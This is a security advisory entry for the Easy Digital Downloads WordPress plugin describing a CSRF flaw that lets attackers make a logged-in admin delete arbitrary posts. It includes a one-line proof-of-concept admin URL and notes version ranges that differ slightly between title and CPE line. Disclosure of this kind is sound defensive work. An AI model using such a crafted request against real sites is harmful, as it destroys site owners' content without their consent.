Lucene search

K
wpvulndbKrzysztof ZającWPVDB-ID:DB3C3C78-1724-4791-9AB6-EBB2E8A4C8B8
HistoryOct 17, 2022 - 12:00 a.m.

Easy Digital Downloads < 3.0 - Arbitrary Post Deletion via CSRF

2022-10-1700:00:00
Krzysztof Zając
wpscan.com
4
easy digital downloads
arbitrary post deletion
csrf
payment history
wordpress plugin

0.001 Low

EPSS

Percentile

25.9%

The plugin does not have CSRF check in place when deleting payment history, and does not ensure that the post to be deleted is actually a payment history. As a result, attackers could make a logged in admin delete arbitrary post via a CSRF attack

PoC

https://example.com/wp-admin/edit.php?post_type=download&amp;page;=edd-payment-history&amp;payment;[0]=1&amp;payment;[1]=2&amp;action;=delete

CPENameOperatorVersion
easy-digital-downloadslt3.1.0.2

0.001 Low

EPSS

Percentile

25.9%

Related for WPVDB-ID:DB3C3C78-1724-4791-9AB6-EBB2E8A4C8B8